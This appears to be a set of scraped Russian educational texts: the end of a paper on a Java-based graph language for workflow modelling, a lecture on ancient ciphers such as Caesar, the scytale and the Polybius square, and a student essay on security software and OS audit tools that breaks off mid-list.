Класс Graph является классом для классов, который объединяет функциональность классов Node и Edge. В данном классе реализовано классическое представление графа в виде совокупности вершин и ребер, соединяющие некоторые из этих вершин. Класс позволяет хранить произвольное количество вершин, имеющих определенное семантическое значение. Кроме того, класс обеспечивает возможность установления и хранения произвольного количества связей между заданными вершинами.
В модели документооборота, реализованной на графах, это класс выполняет функцию депозитария бизнес - процессов. В этом классе обеспечено хранение и управление основными данными, составляющими документооборот, а именно – участниками документооборота, действиями участников и документами. Описанные с помощью этого класса процессы являются обобщенными копиями реальных процессов, происходящих в организации. При установленной общности, возможно использования обьектно- ориентированного наследования. Из депозитария берется копия нужного класса, по макету которого создается реализация, которая представляет собой активный процесс документооборота.
Метод createNode предназначен для создания множества вершин графа. То есть для создания множества состояний документов, используемых в процессе. Метод createEdge используется для создания множества ребер графа документооборота. В применении к модели документооборота это означает множество действий, которые производятся участниками для изменения состояний документов. Методы deleteNode и deleteEdge используются при удалении вершины и ребра соответственно. Методы getNodes и getEdges используются для создания упорядоченных коллекций, являющихся хранилищем для множества вершин и множества ребер.
Методы getName и setName пременен для хранения специфической информации, которая используется для индивидуального обозначения каждого процесса. Этот методы был использован в связи с тем, что в практическом использовании часто возникает ситуация в которой создается много очень похожих процессов по которым движется много похожих документов. В таких случая применяется индивидуальное маркирование процессов, которое свойственно процессу в пределах его жизненного цикла.
Ниже приведен текст интерфейса класса Graph.
package javax.workflow;
public interface Graph
{
Collection getNodes();
Collection getEdges();
Node createNode(Object value);
Edge createEdge(Node in, Node out, Object direction, Object value);
void deleteNode(Node node) throws InvalidOperation;
void deleteEdge(Edge edge) throws InvalidOperation;
String getName();
void setName(String name);
}
3.1.4. Класс HyperGraph
Класс HyperGraph является высшим из классов в иерархии языка GJE. Этот класс обьединяет в себе все вышеописанные классы и действия над ними. Действия над классами реализованы в соответствии с алгеброй документооборота, предложенной автором в работе [10]. Кроме алгебры документооборота, в методах этого класса реализованы методы, которые обеспечивают создание и управление коллекцией графов. Коллекция графов используется для депозитария, в котором хранятся графы.
Гиперграфы – это совокупность графов, объединенных по определенным свойствам. Гиперграфы используют для представления совокупности графов в виде единого целого без потери свойств и характеристик, присущих графам, входящим в гиперграф.
В графовой модели документооборота, гиперграфом описывается совокупность процессов, составляющих документооборот предприятия либо обособленного подразделения. Гиперграф является хранилищем процессов, в котором объединены графы процессов, которые используются, использовались или могут быть использованы на предприятии.
Метод getGraphs используется для создания и управления депозитарием процессов, реализованных в виде коллекции графов. Тип Collection является стандартным типом языка JAVA, который используется для создания и управления большими массивами разнородных данных. Методы addGraph и deleteGraph используются для добавления и удаления графов из депозитария. Для реализации этих задач используются стандартные средства языка JAVA по управлению коллекциями данных. В то же время в реализации языка GJE предусмотрена возможность усиления стандартных возможностей, то есть добавления собственных методов управления данными депозитария.
В классе реализована алгебра документооборота, оперирующая на графах. Реализации методов основаны на описании операций на графах, представленные автором в работе [10]. В настоящую реализацию языка GJE входят следующие операции: объединение, пересечение, разности множеств и декартово произведение множеств.
Метод unionGraph реализует операцию объединения графов. Объединение графов основано на операции объединения множеств. В применении к задачам документооборота эта задача используется при синтезе композитного документооборота из апробированных процессов, хранящихся в депозитарии предприятия.
Метод intersectionGraph используется для реализации операции пересечения графов. Необходимость применения этой операции в графовой модели документооборота возникает, когда требуется получить пересечение существующих процессов. При реализации систем документооборота часто получаются системы, которые состоят из значительного количества процессов. В таких случаях возникает задача анализа процессов для выявления конфликтных и дефицитных исполнительских ресурсов. После применения операции пересечения к нескольким графам, получается результирующий граф, который является графом критического пути. То есть такого пути, появление задержек на котором вызовет возникновение задержек во всем документообороте.
Метод differenceGraph реализует операцию разности на графах. В применении к модели документооборота это означает разницу двух процессов. Даная операция используется, когда возникает задача сравнения различных процессов. Обычно такая задача возникает в случае, когда надо выделить неиспользуемый фрагмент процессов. Для этого используется, так называемый, эталонный процесс. Во время анализа считается, что содержание эталонного процесса является наилучшим для решения рассматриваемого класса задач. Такие эталонные процессы хранятся в депозитарии и могут являться основой документооборота при синтезе сложных процессов. После сравнения эталонного процесса с изучаемым процессом, получается разницы, которую следует критически рассмотреть на предмет возможного улучшения.
Метод cartesianGraph применяется для реализации произведения графов. В задачах документооборота произведение графов используется при получении декартового произведения процессов. Например, необходимость в этом возникает в случае, если возникает задача тиражирования процессов документооборота с некоторым предопределенным параметром. Частным случаем такой задачи можно считать тиражирование с единичным вектором (скаляром) после умножения, на который процесс не изменяется. Таким образом, задача тиражирования процесса с параметром может быть представлена в виде цикла умножения матрицы процесса на матрицу- вектор, которая изменяется от скаляра до установленного значения.
Ниже приведен текст интерфейса класса HyperGraph.
package javax.workflow;
import java.util.Collection;
public interface HyperGraph
{
Collection getGraphs();
void addGraph(Graph graph) throws InvalidOperation;
void deleteGraph(Graph graph) throws InvalidOperation;
Graph unionGraph(Graph graph1, Graph graph2);
Graph intersectionGraph(Graph graph1, Graph graph2);
Graph differenceGraph(Graph graph1, Graph graph2);
Graph cartesianGraph(Graph graph1, Graph graph2);
Graph createGraph(Collection nodes, Collection edges);
}
3.1.5. InvalidOperation
Класс InvalidOperation используется для обработки исключений. Исключения возникают при выполнении операций с депозитариями, не предусмотренных стандартными описателями, а также при некорректных операциях на графах. Этот класс можно использовать для дополнительной индивидуализации приложений, поскольку этому классу передается управление в случае возникновения внештатных ситуаций.
В настоящей реализации для обработки исключений используется конструктор родового класса. Это позволяет разработчику задействовать собственные методы обработки исключений, что обеспечивает дополнительную совместимость и гибкость реализации.
Ниже приведен текст интерфейса класса InvalidOperation.
package javax.workflow;
public class InvalidOperation
extends Exception
{
public InvalidOperation(String message)
{
super(message);
}
}
4. Выводы
В настоящей статье представлен язык обработки графов GJE на базе расширения языка JAVA, который был использован для создания системы проектирования и исполнения систем композитного документооборота. Наряду с операциями над множествами дано описание интерфейсов для классов вершин, ребер, графовых систем и их обьединение. Показана возможность языка GJE как для анализа, так и синтеза системы композитного документооборота.
Благодаря построения языка GJE как расширения языка JAVA имеется возможность обеспечить как локальное, так и сетевое взаимодействие между процессами электронного документооборота и адаптации систем к внутренним и внешним условиям использования.
ЛИТЕРАТУРА
1. Теслер Г.С. Новая кибернетика.- Киев: Логос, 2004. – 401с.
2. Круковский М.Ю. Концепция построения моделей композитного документооборота// Математичні машини і системи. – 2004. – № 2. – С. 149с – 163с.
9. Круковский М.Ю. Графовая модель композитного документооборота// Математичні машини і системи. – 2005. – № 3. – С. 149с – 163с.
4. Duncan J. Watts. Small worlds: the dynamics of networks between order and randomness.- Princeton: Princeton university press, 1999. – 262p.
5. S. Crespi-Reghizzi, R. Morpurgo. A language for treating graphs. - Communications of the ACM, May 1970 , Volume 13 Issue 5. 319-323
6. Хювенен Э., Сеппянен Й. Мир Лиспа. В 2-х томах. Т.1: Введение в язык Лисп и функциональное программирование.-М: Мир, 1990.- 447с.; Т.2.: Методы и системы программирования., 1990.-319с.
7. Terrence W. Pratt, Daniel P. Friedman. A language extension for graph processing and its formal semantics. Communications of the ACM, July 1971, Volume 14 Issue 7. 460-467.
8. Medha Shukla Sarkar. GXL: a new graph transformation language Proceedings of the 42nd annual southeast regional conference. 2004. 336-340.
9. M. F. Kleyn, J. C. Browne. A high level language for specifying graph based languages and their programming environments. Proceedings of the 15th international conference on Software Engineering . 1993. 324-335.
10. Thorsten Daum, Robert G. Sargent. A Java based system for specifying hierarchical control flow graph models. Proceedings of the 29th conference on Winter simulation. 1997 . 150-157. |
https://doc4web.ru/informatika/zarozhdenie-kriptografii.html | Зарождение криптографии | https://doc4web.ru/uploads/files/198/0752853110411cf0619fce678017f531.docx | files/0752853110411cf0619fce678017f531.docx | ЗАРОЖДЕНИЕ КРИПТОГРАФИИ.
Материалы к лекции по теме “Криптография в древние времена”
“Тайна головы раба”
Понятие "Безопасность" охватывает широкий круг интересов как отдельных лиц, так и целых государств. В наше мобильное время видное место отводится проблеме информированной безопасности, обеспечению защиты конфиденциальной информации от ознакомления с ней конкурирующих групп Недаром великий психолог Вильям Шекспир в "Короле Лире" изрек: "Чтоб мысль врага узнать, сердца вскрывают, а не то что письма".
О важности сохранения информации в тайне знали уже в древние времена, когда с появлением письменности появилась и опасность прочтения ее нежелательными лицами.
Существовали три основных способа защиты информации. Один из них предполагал защиту ее чисто силовыми методами: охрана документа - носителя информации - физическими лицами, передача его специальным курьером и т.д. Второй способ получил название "стеганография" латино-греческое сочетание слов, означающих в совокупности "тайнопись"). Он заключался в сокрытии самого факта наличия информации. В данном случае использовались так называемые симпатические чернила. При соответствующем "проявлении" бумаги текст становится видимым. Один из примеров сокрытия информации приведен в трудах древнегреческого историка Геродота. На голове раба, которая брилась наголо, записывалось нужное сообщение. И когда волосы его достаточно отрастали, раба отправляли к адресату, который снова брил его голову и считывал полученное сообщение.
Третий способ защиты информации заключался в преобразовании смыслового текста в некий набор хаотических знаков (или букв алфавита). Получатель данного донесения имел возможность преобразовать его в то же самое осмысленное сообщение, если обладал ключом к его построению. Этот способ защиты информации называется криптографическим. Криптография - слово греческое и в переводе означает "тайнопись". По утверждению ряда специалистов криптография по возрасту - ровесник египетских пирамид. В документах древних цивилизаций - Индии, Египта, Месопотамии - есть сведения о системах и способах составления шифрованных писем.
В древнеиндийских рукописях описаны 64 способа письма. Один из самых старых шифрованных текстов из Месопотамиипредставляет собой табличку, написанную клинописью и содержащую рецепт для изготовления глазури для гончарных изделий. Для написания его были использованы редко употребляемые клинописные знаки, игнорировались некоторые гласные и согласные и употреблялись числа вместо имен.
Шифрованные тексты Древнего Египта - это чаще всего религиозные тексты и медицинские рецепты.
Совершенно отсутствуют сведения об использовании шифров в Древнем Китае, что объясняется, по-видимому, сложностью употреблявшегося иероглифического письма.
Наиболее полные и достоверные сведения о шифрах относятся к Древней Греции.
Основные понятия криптографии - шифр (от арабского "цифра"; арабы первыми стали заменять буквы на цифры с целью защиты исходного текста). Секретный элемент шифра, недоступный посторонним, называется ключом шифра. Как правило, в древние времена использовались так называемые шифры замены и шифры перестановки.
Историческим примером шифра замены является шифр Цезаря (1 век до н.э.), описанный историком Древнего Рима Светонием. Гай Юлий Цезарь использовал в своей переписке шифр собственного изобретения. Применительно к современному русскому языку он состоял в следующем. Выписывался алфавит: А, Б, В, Г, Д, Е,...,; затем под ним выписывался тот же алфавит, но со сдвигом на 3 буквы влево:
А
Б
В
Г
Д
Е
Е
Ж
З
И
Й
К
Л
М
Н
О
П
Р
С
Т
У
Ф
Х
Ц
Ч
Ш
Щ
Ы
Ь
Ъ
Э
Ю
Я
Г
Д
Е
Е
Ж
3
И
И
К
Л
М
Н
О
П
Р
С
Т
У
Ф
Х
Ц
Ч
Ш
Щ
Ы
Ь
Ъ
Э
Ю
Я
А
Б
В
При зашифровке буква А заменялась буквой Г Б заменялась на Д, Б-Ей так далее. Так, например, слово "РИМ" превращалось в слово "УЛП". Получатель сообщения "УЛП" искал эти буквы в нижней строке и по буквам над ними восстанавливал исходное слово "РИМ". Ключом в шифре Цезаря является величина сдвига 3-й нижней строки алфавита. Преемник Юлия Цезаря - Цезарь Август - использовал тот же шифр, но с ключом - сдвиг 4. Слово "РИМ" он в этом случае зашифровал бы в буквосочетание "ФМР".
В художественной литературе классическим примером шифра замены является известный шифр "Пляшущие человечки" (К. Дойля). В нем буквы текста заменялись на символические фигурки людей. Ключом такого шифра являлись позы человечков,, заменяющих буквы...
Для примера шифра перестановки выберем целое положительное число, скажем 5; расположим числа от 1 до 5 в двустрочной записи
1
2
3
4
5
3
2
5
1
4
Зашифруем фразу "СВЯЩЕННАЯ РИМСКАЯ ИМПЕРИЯ". В этой фразе 23 буквы. Дополним ее двумя произвольными буквами (например,Ь.Э) до ближайшего числа, кратного 5, то есть 25. Выпишем эту дополненную фразу без пропусков, одновременно разбив ее на пятизначные группы:
СВЯЩЕ ННАЯР ИМСКА ЯИМПЕ РИЯЬЭ
Буквы каждой группы переставим в соответствии с указанной двухстрочной записью по следующему правилу: первая буква встает на третье место, вторая - на второе, третья на пятое, четвертая на первое и пятая на четвертое. Полученный текст выписывается без пропусков:
ЩВСЕЯЯННРАКМИАСПИЯЕМЬИРЭЯ
При расшифровании текст 1 разбивается на группы по 5 букв и буквы переставляются в обратном порядке: 1 на 4 место, 2 на 2,3 на 1, 4 на 5 и 5 на 3. Ключом шифра является выбранное число 5 и порядок расположения чисел в нижнем ряду двухстрочной записи.
Одним из первых приборов, реализующих шифр перестановки, является так называемый прибор СЦИТАЛЛА. Он был изобретен в древней "варварской" Спарте во времена Ликурга; Рим быстро воспользовался этим прибором. Для зашифрования текста использовался цилиндр заранее обусловленного диаметра. На цилиндр наматывался тонкий ремень из пергамента, и текст выписывался построчно по образующей цилиндра (вдоль его оси). Затем ремень сматывался и отправлялся - получателю сообщения. Последний наматывал его на цилиндр того же диаметра и читал текст по оси цилиндра. В этом примере ключом такого шифра являлся диаметр цилиндра и его длина, которые, по существу, порождают двухстрочную запись, указанную выше.
Интересно, что изобретение дешифровального устройства "АНТИСЦИТАЛЛА" приписывается великому Аристотелю. Он предложил для этого использовать конусообразное "копье", на которое наматывался перехваченный ремень, который передвигался по оси до того положения, пока не появлялся осмысленный текст.
Были и другие способы защиты информации, разработанные в античные времена. Древнегреческий полководец Эней Тактика в IV веке до н.э. предложил устройство, названное впоследствии "диском Энея". Принцип его был прост. На диске диаметром 10-15 см и толщиной 1-2 см высверливались отверстия по числу букв алфавита. В центре диска помещалась "катушка" с намотанной на ней ниткой достаточной длины. При зашифровании нитка "вытягивалась" с катушки и последовательно протягивалась через отверстия, в соответствии с буквами шифруемого текста. Диск и являлся посланием. Получатель послания последовательно вытягивал нитку из отверстий, что позволяло ему получать передаваемое сообщение, но в обратном порядке следования букв. При перехвате диска недоброжелатель имел возможность прочитать сообщение тем же образом, что и получатель. Но Эней предусмотрел возможность легкого уничтожения передаваемого сообщения при угрозе захвата диска. Для этого было достаточно выдернуть "катушку" с закрепленным на ней концом нити до полного выхода всей нити из всех отверстий диска.
Идея Энея была использована в создании и других оригинальных шифров замены. Скажем, в одном из вариантов вместо диска использовалась линейка с числом отверстий, равных количеству букв алфавита. Каждое отверстие обозначалось своей буквой; буквы по отверстиям располагались в произвольном порядке. К линейке была прикреплена катушка с намотанной на нее ниткой. Рядом с катушкой имелась прорезь. При шифровании нить протягивалась через прорезь, а затем через отверстие, соответствующее первой букве шифруемого текста, при этом на нити завязывался узелок в месте прохождения ее через отверстие; затем нить возвращалась в прорезь и аналогично зашифровывалась вторая буква текста и т.д. После окончания шифрования нить извлекалась и передавалась получателю сообщения. Тот, имея идентичную линейку, протягивал нить через прорезь до отверстий, определяемых узлами, и восстанавливал исходный текст по буквам отверстий.
Это устройство получило название "линейка Энея". Шифр, реализуемый линейкой Энея, является одним из примеров шифра замены: когда буквы заменяются на расстояния между узелками с учетом прохождения через прорезь. Ключом шифра являлся порядок расположения букв по отверстиям в линейке. Посторонний, получивший нить (даже имея линейку, но без нанесенных на ней букв), не сможет прочитать передаваемое сообщение.
Аналогичное "линейке Энея" "узелковое письмо" получило распространение у индейцев Центральной Америки. Свои сообщения они также передавали в виде нитки, на которой завязывались разноцветные узелки, определявшие содержание сообщения.
Заметным вкладом Энея в криптографию является предложенный им так называемый книжный шифр, описанный в сочинении "Об обороне укрепленных мест". Эней предложил прокалывать малозаметные дырки в книге или в другом документе над буквами (или под ними) секретного сообщения. Интересно отметить, что в первой мировой войне германские шпионы использовали аналогичный шифр, заменив дырки на точки, наносимые симпатическими чернилами на буквы газетного текста. Книжный шифр в современном его виде имеет несколько иной вид. Суть этого шифра состоит в замене букв на номер строки и номер этой буквы в строке и заранее оговоренной странице некоторой книги. Ключом такого шифра является книга и используемая страница в ней. Этот шифр оказался "долгожителем" и применялся даже во времена второй мировой войны.
Еще одно изобретение древних греков - так называемый квадрат Полибия. Применительно к современному латинскому алфавиту из 26 букв шифрование по этому квадрату заключалось в следующем. В квадрат размером 5x6 клеток выписываются все буквы алфавита, при этом буквы I,J не различаются (J отождествляется с буквой I);
A
B
C
D
E
A
A
B
C
D
E
D
F
G
H
I
K
C
L
M
N
O
P
D
Q
R
S
T
U
E
V
W
X
Y
Z
Шифруемая буква заменялась на координаты квадрата, в котором она записана. Так, B заменялась на AB, F на BA, R на DB и т.д. При расшифровании каждая такая пара определяла соответствующую букву сообщения. Ключом такого шифра являлось расположение букв в таблице 5x5.
Интересно отметить, что в несколько измененном виде шифр Полибия дошел до наших дней и получил своеобразное название "тюремный шифр". Для его использования нужно только знать естественный порядок расположения букв алфавита (как в указанном выше примере для английского языка). Стороны квадрата обозначаются не буквами (ABCDE), а числами (12345). Число 3, например, передается путем тройного стука. При передаче буквы сначала "отстукивается число, соответствующее строке, в которой находится буква, а затем номер соответствующего столбца. Например, буква "F" передается двойным стуком (вторая строка) и затем одинарным (первый столбец).
С применением этого шифра связаны некоторые исторические казусы. Так. декабристы, посаженные в тюрьму после неудавшегося восстания, не смогли установить связь с находившимся в "одиночке" князем Одоевским. Оказалось, что этот князь (хорошо образованный по тем временам) не помнил естественный порядок расположения букв в русском и французском алфавитах (другими языками он не владел). Декабристы для русского алфавита использовали прямоугольник размера 5x6 (5 строк и 6 столбцов) и редуцированный до 30 букв алфавит.
"Тюремный шифр", строго говоря, не шифр, а способ перекодировки сообщения с целью его приведения к виду, удобному для передачи по каналу связи (через стенку). Дело в том, что в таблице использовался естественный порядок расположения букв алфавита. Отметим, что при произвольном расположении букв в квадрате возникает одно затруднение: либо нужно помнить отправителю и получателю сообщения заданный произвольный порядок следования букв в таблице (ключ шифра), что вообще говоря затруднительно, либо иметь при себе запись этих букв. Во втором случае появляется опасность ознакомления с ключом посторонних лиц. Поэтому в ряде случаев ключ составляется следующим образом. Берется некоторое "ключевое слово", которое легко запомнить, например, "CRYPTOLOGY", удаляют из него повторы букв (получают "CRYPTOLOG") и записывают его в начальных клетках квадрата. В оставшиеся клетки записываются остальные буквы алфавита в естественном порядке.
A B C D E A C R Y P T B O L G A B C D E F H I E U V W X Z
В таком шифре ключом является указанное "ключевое слово" ("пароль"). Заметим, кстати, что таким же образом можно легко запомнить порядок следования букв и в "линейке Энея".
Крах Священной Римской империи породил средневековье. Этот период в жизни человечества характеризуется и упадком интеллектуальной деятельности. Во времена, когда сама грамотность была доступна очень узкому кругу людей, необходимость в криптографической защите информации стояла не столь остро. Так, король франков и Священной Римской империи Карл Великий научился читать и писать в возрасте 50 лет, а "завоеватель Вселенной" Чингис-хан остался безграмотным на всю жизнь. Тем не менее Карл Великий уже знал и использовал некоторые шифры замены. Просвещение и грамотность в эти времена сосредоточились в церкви, и тайнопись стала ее монополией. Церковь постановила, что простым прихожанам нельзя скрывать тайны от "господа"; их тайнопись - это "ересь". За использование тайнописи предусматривались жесткие меры наказания, вплоть до смертной казни.
Тем не менее криптография не умерла. Серьезный вклад в ее развитие внесли арабы. Некоторые историки считают, что криптография как наука зародилась именно в арабском мире. Именно в арабских книгах впервые были описаны методы криптоанализа (дешифрования). О криптографии упоминается и в "Илиаде" Гомера.
ЛИТЕРАТУРА.
Kahn D. The Codebreakers. N-Y, 1967.
Фролов Г. Тайна тайнописи. М., 1992.
Kahn D. Kahn on codes. N-Y, 1983.
Зима И. Расшифрованный Нострадамус, М., 1988.
Зелинский Ф. Сказочная древность Эллады. М., 1993.
Жельников В. Криптография от папируса до компьютера. М., 1996.
Горбовский А. Загадки древнейшей истории М., 1971. |
https://doc4web.ru/informatika/zaschischennie-informacionnie-tehnologii-v-ekonomike.html | Защищенные информационные технологии в экономике | https://doc4web.ru/uploads/files/151/2bda75d01be3e48819f7e00b31676614.docx | files/2bda75d01be3e48819f7e00b31676614.docx | 2
Реферат «Защищенные информационные технологии в экономике»
Содержание
Введение 3
1. Защищенные информационные технологии в Internet 4
1.1. Защита архитектуры «Клиент - сервер» 4
1.2 Анализ защищенности ОС 7
1.3. Защита каналов связи в Internet 11
1.4 Отечественные защищенные системы 15
2. Интегральные устройства защиты информации 16
Заключение 21
Список литературы 23
Введение
Под термином "информационная безопасность", согласно определению Гостехкомиссии при Президенте РФ, понимают состояние защищенности информации, обрабатываемой средствами вычислительной техники или автоматизированной системы, от внутренних или внешних угроз: от нежелательного ее разглашения (нарушения конфиденциальности), искажения (нарушения целостности), утраты или снижения степени доступности информации, а также ее незаконного тиражирования, которые приводят к материальному или моральному ущербу владельца или пользователя информации. Соответственно, под защитой информации подразумевается комплекс мероприятий, проводимых с целью предотвращения от действий угроз безопасности информации, где угроза является потенциальной возможностью нарушения безопасности информации.
Когда говорят об информационной безопасности, то имеют в виду широкий спектр проблем: от стихийных бедствий и проблем с электропитанием до искушенных злоумышленников, которые используют вычислительные системы к своей выгоде, или шпионов, которые охотятся за государственными и коммерческими секретами [2].
Функционирование современной информационной системы определяется взаимодействием различных приложений, работающих в распределенной среде с использованием механизмов различных операционных систем, которые установлены на серверах и рабочих станциях. Чтобы эффективно реализовать преимущества работы с распределенными ресурсами, используются сетевые решения, зачастую достаточно сложные как структурно, так и функционально. Обеспечение безопасности такой системы требует проведения целого комплекса мероприятий в соответствии с разработанной на предприятии политикой информационной безопасности.[5]
Важнейшими на практике являются следующие три аспекта информационной безопасности:
доступность (возможность за разумное время получить требуемую информационную услугу);
целостность (актуальность и непротиворечивость информации, ее защищенность от разрушения и несанкционированного изменения);
конфиденциальность (защита от несанкционированного ознакомления).
1. Защищенные информационные технологии в Internet
1.1. Защита архитектуры «Клиент - сервер»
В основе общения с сетью Internet лежит технология клиент/сервер. Определений архитектуры клиент/сервер очень много. В общем случае это такой способ проектирования информационной системы, при котором она может быть рассмотрена как совокупность некоторого числа подсистем двух видов — клиентской и серверной. Клиентская часть системы инициирует запросы, а серверная обрабатывает запросы и при необходимости генерирует ответы клиенту.
Принято разделять классическую и многозвенную архитектуру клиент/сервер. В первом случае имеется выделенный сервер, который полностью обрабатывает запросы некоторого числа клиентов. Типичным примером такого сервера является сервер баз данных. Такой подход требует высоких аппаратных затрат для оборудования сервера. Также должна обеспечиваться бесперебойная работа самого сервера, что требует очень серьезного подхода к его администрированию и разработке ПО для него.
Программы управления безопасностью в распределенных системах - мониторы безопасности - используют глобальные таблицы безопасности (ГТБ), в которых хранятся пользовательские пароли для доступа ко всем узлам системы. Если пользователь правильно вводит первый пароль, от ввода остальных он освобождается. Всю работу за него выполняет монитор, который следит за тем, к какой подсистеме обращается пользователь, выбирает нужный пароль из таблицы и передает его на вход соответствующей подсистемы. В сложных сетевых средах для реализации процедур однократной регистрации применяются также доверительные отношения между серверами разных доменов[2].
На российском рынке представлены, в основном, программные средства компьютерной защиты среды «клиент – сервер»[2].
AutoSecure фирмы Platinum Technology. ПО AutoSecure (первоначально известное под именем SeOS компании Метсо Software) представляет собой набор средств защиты вычислительных систем с серверами под ОС Unix, HP-UX, AIX и SunOS/Solaris и клиентскими станциями с интерфейсом Motif.
В состав программы входят три независимых модуля:
1) AutoSecure Access Control — контролирует доступ пользователей к защищаемым программам и файлам, а в случае попыток несанкционированного доступа извещает о них администратора системы;
2) AutoSecure Security Administrator — служит для ведения списков пользователей, групп пользователей, защищаемых ресурсов, настройки прав доступа пользователей к ресурсам;
3) AutoSecure Single Sign On - открывает пользователям доступ к данным, хранящимся на мэйнфреймах. В этом случае администратор и пользователи получают такой же уровень безопасности и комфортности, как и на больших машинах, где используются системы RACF корпорации IBM или ACF2 от Computer Associates.
Ниже приведены основные особенности продукта фирмы Platinum:
• защита корпоративных данных от НСД за счет идентификации пользователей и проверки их полномочий;
• предотвращение случаев нарушения системы защиты и уведомление системного администратора при обнаружении попыток "взлома" и подозрительного поведения пользователей (вроде попыток подбора пароля, запуска приложений из закрытых каталогов и пр.);
• фиксация пользовательской активности в системных журналах;
• возможность администрирования системы защиты с локальных или удаленных компьютеров;
• масштабируемость системы в зависимости от размера компьютерной сети;
• минимизация сетевого графика без снижения общей производительности за счет обработки авторизованного запроса на том компьютере, откуда он поступил;
• возможность адаптации к промышленным стандартам за счет поддержки технологии защиты, принятой в распределенной вычислительной среде DCE;
• возможность ограничения прав суперпользователя (пользователь Unix с максимальными правами доступа).
Guardian DataLynx. Guardian за короткий срок стал стандартом де-факто для систем учета и контроля доступа в среде Unix. Программа поддерживает около 20 версий этой ОС и имеет общий для всех платформ графический интерфейс Motif. С помощью ПО Guardian администратор системы может назначить временные рамки, в пределах которых пользователи могут регистрироваться в системе. Как только время работы истекает, Guardian вынуждает пользователя закончить работу.
Большое внимание система уделяет дисциплине ведения паролей. Так, программа регулярно напоминает пользователям о необходимости смены паролей, заставляет всех или некоторых пользователей изменять пароли при очередной регистрации, ведет учет ранее вводимых паролей, автоматически генерирует миллионы паролей с форматным контролем (FIPS-181). Когда пользователь превышает число допустимых попыток ввода паролей, Guardian блокирует его вход в систему. Предусмотрено постоянное ведение журналов, в которых фиксируется история работы пользователей.
Программа функционирует на компьютерах HP, IBM и Sun Microsystems.
OmniGuard фирмы Axent Technologies - комплект продуктов, предназначенный для решения проблем безопасности в системах клиент/сервер. Пакет состоит из шести компонентов, позволяющих администрировать базы данных в распределенных сетях масштаба предприятия.
Функции продукта охватывают все аспекты проблемы безопасности в архитектурах клиент/сервер, включая управление защитой данных, идентификацию и администрирование пользователей, мониторинг графика, контроль за вторжением в систему извне, обеспечение безопасного обмена сообщениями и файлами.
OmniGuard реализован в архитектуре клиент/сервер, поддерживает несколько платформ и конструктивно состоит из трех частей: презентационной части, управляющего сервера и интеллектуального агента. По желанию интерфейс пользователя может быть настроен под X/Motif или Windows. Управляющий сервер работает на платформах NetWare, OpenVMS и различных вариантах Unix.
DBA-Xpert for Oracle фирмы Compuware — средство централизованного администрирования и обеспечения защиты информации в распределенных системах.
Продукт поддерживает работу с произвольным числом баз данных. Имеются средства анализа и навигации для БД Oracle.
Состоит из трех компонентов: Secure-Xpert (централизованное управление системой безопасности для распределенных данных), Change-Xpert (функции синхронизации) и Reorg-Xpert (операции по загрузке/выгрузке данных).
SQL Secure 3.1 фирмы BrainTree Technology — приложение класса клиент/сервер для администрирования средств защиты информации в базах данных Oracle. Программа фиксирует попытки внедрения в систему извне, синхронизирует пароли пользователей в нескольких БД, позволяет гибко настроить процесс внутреннего аудита, регламентирует доступ пользователей к таблицам базы данных на уровне строк.
Благодаря компоненту Password Manager пользователь может работать с несколькими базами данных на разных аппаратных платформах, используя единый пароль. Кроме того, возможна настройка механизма управления паролями пользователей в соответствии с принятыми в конкретной организации стандартами: предусмотрено задание минимальной длины пароля и срока его действия, допустимого числа попыток подбора пароля при регистрации в базе данных.
Администратор может запрограммировать ряд действий, выполняемых в случае обнаружения в системе несанкционированного пользователя или попыток ее "взлома", к которым относятся запрет дальнейшей работы с БД и активизация аварийной процедуры.
Программный модуль Audit Manager предназначен для просмотра аудиторских журналов. При этом возможно наложение фильтра просмотра и определение порядка сортировки записей в журналах. Дополнительно можно описать критические события и действия, которые должны выполняться в случае их возникновения.
Secure Network Services фирмы Oracle — набор сервисных средств, предназначенный для работы с продуктом SQL*Net корпорации Oracle и поддерживающий стандарт шифрования информации R4 компании RSA Data Security. Аппаратные платформы — DEC, Hewlett-Packard, Silicon Graphics и др.
1.2 Анализ защищенности ОС
Для анализа защищенности ОС разрабатываются специализированные средства. Средства данного класса позволяют производить ревизию перечисленных выше механизмов защиты ОС: подсистемы разграничения доступа, механизмов идентификации и аутентификации, средств мониторинга, аудита и других компонент с точки зрения соответствия их конфигурации требуемому уровню защищенности системы. Кроме этого, производится контроль целостности ПО (включая неизменность программного кода и системных установок с момента предыдущего анализа) и проверка наличия уязвимостей системных и прикладных служб. Такая проверка производится с использованием базы данных об уязвимостях сервисных служб или определенных версий программного обеспечения, которая входит в состав средств анализа.
Кратко рассмотрены в [2] некоторые средства анализа защищенности ОС.
ASET (Automated Security Tool) — это программное средство администратора ОС Solaris, обеспечивающее автоматизированное выполнение задач мониторинга и контроля уровня безопасности указанной ОС.
ASET поддерживает три уровня безопасности, накладывающие определенные требования к защищенности системы в целом: низкий, средний и высокий. Низкий уровень после последовательных проверок гарантирует, что атрибуты всех системных файлов соответствуют стандартным установкам. ASET выдает отчет о потенциальных уязвимостях системы, но на данном уровне не производит каких-либо действий по устранению обнаруженных уязвимостей. Средний уровень обеспечивает контроль большинства объектов системного окружения. ASET модифицирует некоторые атрибуты системных файлов и переменных окружения, а также ограничивает доступ в систему, уменьшая таким образом возможность успешного проведения атак. ASET выдает отчет об обнаруженных уязвимостях, о произведенных изменениях атрибутов файлов и об введенных ограничениях доступа в систему. Изменения сервисных служб на данном уровне не производятся. При высоком уровне гарантируется высокая защищенность системы и модифицируются атрибуты всех системных файлов и переменных окружения. Большинство системных приложений и команд продолжает функционировать в обычном режим, но задачи обеспечения безопасности обладают наивысшим приоритетом над системными и пользовательскими задачами.
ASET выполняет семь основных задач по мониторингу и управлению уровнем безопасности системы. Для каждой из задач производятся свои специфические проверки и модификации, а также генерируются отчеты по обнаруженным уязвимостям и выполненным изменениям в системных файлах. Проверке подвергаются:
• атрибуты доступа и использования системных файлов;
• соответствие системных файлов их описаниям в шаблонах безопасности:
• бюджеты пользователей и групп;
• файлы конфигурации системы;
• переменные окружения;
• уровень защиты низкоуровневой конфигурации eeprom;
• уровень защищенности при использовании системы в качестве МЭ.
ASET можно использовать как в интерактивном режиме с вызовом из командной строки, так и в автоматическом режиме с определенной периодичностью.
Пакет программ COPS (Computer Oracle and Password System) Д. Фармера — свободно распространяемое средство администратора безопасности Unix-систем для обнаружения уязвимостей в подсистеме безопасности ОС SunOS, FreeBSD, IRIX, AIX, 4.3BSD, Ultrix, HP-Unix, NeXT и некоторых других. Ядро системы - это собрание приблизительно десятка программ, каждая из которых находит различные проблемы в Unix-безопасности. Эти программы проверяют:
• файлы, директории и устройства по разрешенному доступу;
• надёжность паролей методом перебора с использованием словаря;
